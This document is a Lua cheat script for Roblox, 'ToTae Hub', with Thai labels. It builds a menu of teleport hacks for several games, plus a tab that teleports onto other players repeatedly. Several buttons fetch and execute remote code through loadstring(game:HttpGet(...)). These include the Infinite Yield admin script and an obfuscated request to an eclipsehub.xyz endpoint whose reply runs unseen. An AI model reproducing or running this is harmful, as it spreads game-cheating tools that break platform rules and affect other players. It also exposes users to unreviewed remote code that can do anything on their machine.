
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("ToTae Hub v1 BY แท", "Sentinel")
local Tab = Window:NewTab("Ultra Power Tycoon")
local Section = Tab:NewSection("วาป Teleport")
Section:NewButton("จุดเกิด", "วาปไปจุดเกิดแบบ EZ", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(100.760567, 12.758956, 17.0090847, -0.999963641, 7.8059994e-09, -0.00853039604, 8.4331564e-09, 1, -7.34843084e-08, 0.00853039604, -7.35535721e-08, -0.999963641)
end)
Section:NewButton("เจ้านายไม้", "วาป", function()
   game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-49.7908707, 8.77790928, 95.1766129, -0.0436148047, 2.85737887e-08, -0.999048412, -1.91162961e-08, 1, 2.94355509e-08, 0.999048412, 2.03819308e-08, -0.0436148047) 
end)
Section:NewButton("ถูกสาป", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-48.9727745, 8.77790928, 252.503799, -0.0697602183, -6.76073153e-09, -0.997563779, 7.13027717e-08, 1, -1.17634871e-08, 0.997563779, -7.19496924e-08, -0.0697602183)
end)
Section:NewButton("ลอร์ดทราย", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-49.136673, 8.77790928, -65.9218063, -1.2870878e-06, 6.31726138e-08, -1, -4.86849743e-08, 1, 6.31726778e-08, 1, 4.8685056e-08, -1.2870878e-06)
end)
Section:NewButton("เปลวไฟสีเข้ม", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-49.8723984, 8.77790928, -233.45491, 0.0174528118, -6.97552096e-08, -0.99984771, 6.56380506e-09, 1, -6.96512643e-08, 0.99984771, -5.34719513e-09, 0.0174528118)
end)
Section:NewButton("ก้อย", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(100.827278, 8.81130886, 383.66214, 0.999961972, -1.64347931e-08, 0.00872112811, 1.66176211e-08, 1, -2.08912905e-08, -0.00872112811, 2.10354205e-08, 0.999961972)
end)
Section:NewButton("นิรันดร์", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(102.021095, 8.77791309, -358.589478, -0.9993909, 5.56797417e-08, -0.0348982289, 5.71461953e-08, 1, -4.10234406e-08, 0.0348982289, -4.29927525e-08, -0.9993909)
end)
Section:NewButton("กด", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(252.917435, 8.71943092, 253.753128, 0.0610934719, -2.79568058e-09, 0.99813205, 2.25763568e-08, 1, 1.41906331e-09, -0.99813205, 2.2447491e-08, 0.0610934719)
end)
Section:NewButton("ตาตาย", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(252.927612, 8.71943092, 95.8941879, -0.0261852462, -3.79915157e-08, 0.999657094, -5.90142371e-08, 1, 3.64587152e-08, -0.999657094, -5.80393227e-08, -0.0261852462)
end)
Section:NewButton("แอบ", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(251.378357, 8.71943092, -64.7202301, -0.0790378377, 3.43104212e-08, 0.996871591, 2.73997824e-09, 1, -3.42008519e-08, -0.996871591, 2.82449272e-11, -0.0790378377)
end)
Section:NewButton("ความโกรธ", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(252.463058, 8.71943092, -232.072678, 0.0697607696, -3.88844086e-08, 0.997563779, 1.68444334e-08, 1, 3.78014242e-08, -0.997563779, 1.41663401e-08, 0.0697607696)
end)

-- CuTs New Games เกมต่อไป 


local Tab = Window:NewTab("MODs OP")
local Section = Tab:NewSection("MODS OP")
Section:NewButton("", "INFiniteYield", function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()
end)
Section:NewButton("eclipsehub", "MOD", function()
    getgenv().mainKey = "nil"

local a,b,c,d,e=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,tostring,"https://api.eclipsehub.xyz/auth"c(a and b,"Executor not Supported")a(b({Url=e.."\?\107e\121\61"..d(mainKey),Headers={["User-Agent"]="Eclipse"}}).Body)()
end)
  

  -- New Tap --

  local Tab = Window:NewTab("raise a floppa")
  local Section = Tab:NewSection("TelePort Hack")

Section:NewButton("Farm", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-119.964867, 3.49999928, -39.648941, 0.00872910488, 1.99803498e-08, 0.999961913, -6.9584118e-08, 1, -1.93736813e-08, -0.999961913, -6.94123514e-08, 0.00872910488)
end)

Section:NewButton("home", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-55.5673714, 7.84999895, -37.5611763, 1, 0, 0, 0, 1, 0, 0, 0, 1)
end)  

Section:NewButton("Back Room", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-12604.9141, 57.9847794, -16110.0225, -0.623035848, -7.92313415e-08, 0.782193303, -6.08016109e-08, 1, 5.28638644e-08, -0.782193303, -1.46225299e-08, -0.623035848)
end)

Section:NewButton("UFO", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(33.0168495, -82.0000229, 400.750153, -0.00352185383, 1.10998144e-07, 0.999993801, -1.85359739e-09, 1, -1.11005356e-07, -0.999993801, -2.24453056e-09, -0.00352185383)end)


Section:NewButton("home doge", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-24.8500862, 2.733181, -12.3369083, -0.0508012436, 0.00132487691, -0.998707891, -0.00165077811, 0.999997616, 0.00141055789, 0.998707414, 0.0017203032, -0.050798934)
end)

Section:NewButton("🍔🍕", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-50.1142502, 8.18000221, -63.6574745, -0.999847531, 2.05033572e-08, 0.0174614787, 1.96351557e-08, 1, -4.98923818e-08, -0.0174614787, -4.95419137e-08, -0.999847531)
end)

Section:NewButton("Poop💩💩", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-72.3145523, 7.79999828, -20.5333519, 0.999391258, -4.14034069e-08, 0.0348864831, 4.06725853e-08, 1, 2.1658261e-08, -0.0348864831, -2.02261532e-08, 0.999391258)
end)

Section:NewButton("Reset died", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-23.9255867, -285.339844, -4.96770096, 0.0748794004, -0.991404533, 0.107285134, -0.0796834454, 0.101294421, 0.991660237, -0.994003832, -0.0828037709, -0.071413666)
end)

-- cuts --

local Tab = Window:NewTab("Brookhaven") 

local Section = Tab:NewSection("TeleportS")

Section:NewButton("เครื่องบิน", "วาป", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(448.618866, -109.045708, 106.839424, 0.495042533, 5.29545474e-09, 0.868868768, -2.40885356e-09, 1, -4.72219774e-09, -0.868868768, 2.44710974e-10, 0.495042533)
end)

--- cut\


local Tab = Window:NewTab("tp To Player")
local Section = Tab:NewSection("Select Player!")
Plr = {}
for i,v in pairs(game:GetService("Players"):GetChildren()) do
    table.insert(Plr,v.Name) 
end
local drop = Section:NewDropdown("Select Player!", "Click To Select", Plr, function(t)
   PlayerTP = t
end)
Section:NewButton("Click To TP", "", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[PlayerTP].Character.HumanoidRootPart.CFrame
end)
Section:NewToggle("Auto Tp", "", function(t)
_G.TPPlayer = t
while _G.TPPlayer do wait()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[PlayerTP].Character.HumanoidRootPart.CFrame
end
end)

Section:NewButton("Refresh Dropdown","Refresh Dropdown", function()
  drop:Refresh(Plr)
end)

